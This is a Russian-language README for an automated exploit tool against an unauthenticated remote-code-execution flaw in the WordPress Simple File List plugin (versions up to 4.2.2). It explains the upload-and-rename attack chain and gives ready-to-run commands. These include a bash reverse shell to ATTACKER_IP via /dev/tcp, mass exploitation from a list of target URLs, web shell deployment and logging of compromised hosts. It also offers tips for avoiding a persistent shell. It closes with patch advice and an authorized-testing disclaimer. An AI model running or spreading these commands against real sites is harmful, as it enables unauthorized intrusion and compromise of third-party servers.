
Эксплойт для CVE-2025-34085
Автоматизированный эксплойт для CVE-2025-34085 (дубликат CVE-2020-36847), критической уязвимости неаутентифицированного удаленного выполнения кода в плагине WordPress Simple File List версий ≤ 4.2.2.
Примечание: CVE-2025-34085 был отклонен MITRE как дубликат CVE-2020-36847. Уязвимость реальна и исправлена в версии 4.2.3. Оба идентификатора CVE относятся к одной и той же основной проблеме.
| Поле | Детали |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Плагин | Simple File List |
| Затронутые версии | ≤ 4.2.2 |
| Исправленная версия | 4.2.3 |
| Тип | Неограниченная загрузка файлов → Обход переименования → RCE |
| CVSS | 9.8 (Критический) |
| Аутентификация | Не требуется |
| Первоначальное обнаружение | coiffeur |
| Модуль Metasploit | exploit/multi/http/wp_simple_file_list_rce |
Загрузка — PHP-полезная нагрузка загружается, замаскированная под файл .png через конечную точку загрузки плагина (ee-upload-engine.php). Движок загрузки проверяет расширения, но принимает файлы изображений.
Переименование — Функция переименования плагина (ee-file-engine.php) не применяет ограничения на расширения. Атакующий переименовывает .png в .php (или .phtml, .php5, .php3).
Выполнение — Переименованный PHP-файл теперь доступен и исполняем в каталоге загрузок /wp-content/uploads/simple-file-list/, что дает атакующему возможность произвольного выполнения команд.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Создайте файл targets.txt с одним URL на строку:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
| Аргумент | Описание | По умолчанию |
|---|---|---|
-u, --url | URL одиночной цели | — |
--cmd | Команда для выполнения на цели | id |
--inline | Внедрить команду непосредственно в PHP-шелл (жестко запрограммировано, без веб-шелла ?cmd=) | False |
Совет: Используйте
--inline, когда нужен реверсивный шелл или когда цель фильтрует строку запроса. Без--inlineэксплойт создает веб-шелл, принимающий команды через?cmd=.
Успешные эксплойты записываются в vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt — полезно для отчета--inline с реверсивным шеллом, чтобы избежать оставления постоянного веб-шелла с ?cmd=Обновите плагин Simple File List до версии 4.2.3 или выше.
Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей. Несанкционированный доступ к компьютерным системам является незаконным. Всегда получайте соответствующее разрешение перед тестированием.